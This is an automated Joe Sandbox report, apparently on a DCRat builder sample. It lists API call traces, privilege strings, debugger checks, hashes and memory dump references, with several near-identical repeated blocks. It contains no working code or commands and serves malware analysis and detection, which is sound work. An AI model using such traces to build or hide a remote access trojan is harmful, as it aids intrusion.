                                                                                                                        • Opcode Fuzzy Hash: ee146279d84b6e11ac65e4ead98385b2130499bdb9a82b60cd7dac215c04e91e
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: babbdede5e4478322212316f4d838277884bc23fae31aaece6901b5097e9e11c
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: babbdede5e4478322212316f4d838277884bc23fae31aaece6901b5097e9e11c
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: f7dc657e0dd5a82482c082f178a03d8f1eb654bccff4d2ea5b3ccc523ff426f1
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: f7dc657e0dd5a82482c082f178a03d8f1eb654bccff4d2ea5b3ccc523ff426f1
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: a013c592a3a978f548a681e9255e6636b1c2bf249d7a0e44480fc0d738bdbcb1
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: a013c592a3a978f548a681e9255e6636b1c2bf249d7a0e44480fc0d738bdbcb1
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: d955060c99da30b1258b6df82087732124e82987371cbc74c255a7c10e162263
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: d955060c99da30b1258b6df82087732124e82987371cbc74c255a7c10e162263
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        APIs
                                                                                                                        • SetEndOfFile.KERNELBASE(?,0049903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00499F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 749574446-0
                                                                                                                        • Opcode ID: c631552f5ac040aa239e5822e9896132178bdabebed8fb007472e924367804ad
                                                                                                                        • Instruction ID: 288868d586d2c5609ff8965e305f86cbc537c035a37c4c37e1bb6c10b53ad084
                                                                                                                        • Opcode Fuzzy Hash: c631552f5ac040aa239e5822e9896132178bdabebed8fb007472e924367804ad
                                                                                                                        • Instruction Fuzzy Hash: AFA0243004000D47CD401F31CD0444C3710F7117C130041F45007CF071C7134407C704
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004AAE72,C:\Users\user\Desktop,00000000,004D946A,00000006), ref: 004AAC08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1611563598-0
                                                                                                                        • Opcode ID: 8c3a17734934ad4c7b9d5ceab28aef7d936e35d301e786b41fb7e925bb7ba741
                                                                                                                        • Instruction ID: ad1080f3e12bf685c1d356fe28db6fa8d3527fe9a85c75ac8f50124465a949d9
                                                                                                                        • Opcode Fuzzy Hash: 8c3a17734934ad4c7b9d5ceab28aef7d936e35d301e786b41fb7e925bb7ba741
                                                                                                                        • Instruction Fuzzy Hash: AEA011302002008B82802F328F0AA0EBAAAAFA2B02F08C038A08080030CB30C820AA08
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,004995D6,?,?,?,?,?,004C2641,000000FF), ref: 0049963B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004AC2B1
                                                                                                                        • EndDialog.USER32(?,00000006), ref: 004AC2C4
                                                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 004AC2E0
                                                                                                                        • SetFocus.USER32(00000000), ref: 004AC2E7
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 004AC321
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004AC358
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004AC36E
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004AC38C
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004AC39C
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004AC3B8
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004AC3D4
                                                                                                                        • _swprintf.LIBCMT ref: 004AC404
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004AC417
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004AC41E
                                                                                                                        • _swprintf.LIBCMT ref: 004AC477
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 004AC48A
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004AC4A7
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004AC4C7
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004AC4D7
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004AC4F1
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004AC509
                                                                                                                        • _swprintf.LIBCMT ref: 004AC535
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004AC548
                                                                                                                        • _swprintf.LIBCMT ref: 004AC59C
                                                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 004AC5AF
                                                                                                                          • Part of subcall function 004AAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004AAF35
                                                                                                                          • Part of subcall function 004AAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,004CE72C,?,?), ref: 004AAF84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                        • String ID: %s %s$%s %s %s$PJ$REPLACEFILEDLG
                                                                                                                        • API String ID: 797121971-4073223090
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00496FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00497013
                                                                                                                        • _wcslen.LIBCMT ref: 00497084
                                                                                                                          • Part of subcall function 00497A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00497AAB
                                                                                                                          • Part of subcall function 00497A9C: GetLastError.KERNEL32 ref: 00497AF1
                                                                                                                          • Part of subcall function 00497A9C: CloseHandle.KERNEL32(?), ref: 00497B00
                                                                                                                          • Part of subcall function 0049A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641,000000FF), ref: 0049A1F1
                                                                                                                          • Part of subcall function 0049A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641), ref: 0049A21F
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00497139
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00497155
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00497298
                                                                                                                          • Part of subcall function 00499DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004973BC,?,?,?,00000000), ref: 00499DBC
                                                                                                                          • Part of subcall function 00499DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00499E70
                                                                                                                          • Part of subcall function 00499620: CloseHandle.KERNELBASE(000000FF,?,?,004995D6,?,?,?,?,?,004C2641,000000FF), ref: 0049963B
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3983180755-3508440684
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog_swprintf
                                                                                                                        • String ID: CMT$h%u$hc%u
                                                                                                                        • API String ID: 146138363-3282847064
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00492874
                                                                                                                        • _strlen.LIBCMT ref: 00492E3F
                                                                                                                          • Part of subcall function 004A02BA: __EH_prolog.LIBCMT ref: 004A02BF
                                                                                                                          • Part of subcall function 004A1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0049BAE9,00000000,?,?,?,00010422), ref: 004A1BA0
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00492F91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                        • String ID: CMT
                                                                                                                        • API String ID: 1206968400-2756464174
                                                                                                                        • Opcode ID: 8c4b37b882a231bea77eac90be39d614820d94b4d39364d4ec2d8e0c68140f31
                                                                                                                        • Instruction ID: a81a3659e10a5899cf8c41461d3f8c704e6669bfb5df9b0f5b31a3ac916de11f
                                                                                                                        • Opcode Fuzzy Hash: 8c4b37b882a231bea77eac90be39d614820d94b4d39364d4ec2d8e0c68140f31
                                                                                                                        • Instruction Fuzzy Hash: BB6226716002449FDF19DF38C9856EA3FA1AF15304F08457FEC9A8B382D7B8A945CB28
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004AF844
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004AF910
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004AF930
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 004AF93A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 254469556-0
                                                                                                                        • Opcode ID: fa1d1eeeaf7d9dd63e731c11f7bb3131ea7230a723d56f478ad4a7c417e68999
                                                                                                                        • Instruction ID: f88e6d07126bd016a0955cce8c55df5d26fabd6492faba2324d3684a6079aa01
                                                                                                                        • Opcode Fuzzy Hash: fa1d1eeeaf7d9dd63e731c11f7bb3131ea7230a723d56f478ad4a7c417e68999
                                                                                                                        • Instruction Fuzzy Hash: 7F314B75D052199FDB10DFA4D989BCDBBB8AF18305F1040AAE40CA7250EB759B888F08
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(80000000,004AE5E8,0000001C,004AE7DD,00000000,?,?,?,?,?,?,?,004AE5E8,00000004,004F1CEC,004AE86D), ref: 004AE6B4
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,004AE5E8,00000004,004F1CEC,004AE86D), ref: 004AE6CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 401686933-2746444292
                                                                                                                        • Opcode ID: df4614f07e6be74cbdaa9bf6f3350cf96b7f26706112886d9d06772069c3f5c6
                                                                                                                        • Instruction ID: fc96dc7fa062a88e75b69fb4ae22b9a3f691221488bffe9b012f6d895b7b42be
                                                                                                                        • Opcode Fuzzy Hash: df4614f07e6be74cbdaa9bf6f3350cf96b7f26706112886d9d06772069c3f5c6
                                                                                                                        • Instruction Fuzzy Hash: 3E012B766001096BDF14DE6ADC09FEE7BAAEFD5328F0CC121ED29D7250DA38D9058684
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004B8FB5
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004B8FBF
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 004B8FCC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: d10dc19dae29b874dca6be33aeea0c5f18e10f6e189a6ea01248b0d92552dddd
                                                                                                                        • Instruction ID: c87eb453f17ea18e5adea41704026456c15d14f555f84dc9940863217d7546b6
                                                                                                                        • Opcode Fuzzy Hash: d10dc19dae29b874dca6be33aeea0c5f18e10f6e189a6ea01248b0d92552dddd
                                                                                                                        • Instruction Fuzzy Hash: 4F31D474901218ABCB61DF65DC88BDDBBB8EF18311F5041EAE41CA7250EB349F858F58
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction ID: d5b4d9e222b88a5dfd5ff8230583a7f2376b9fc63727e1a4c2a57d1ebc765a6a
                                                                                                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction Fuzzy Hash: CF022D71E002199FDF14DFA9C9806EEBBF1EF48314F1581AAD819E7344EB34A941CB94
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004AAF35
                                                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,004CE72C,?,?), ref: 004AAF84
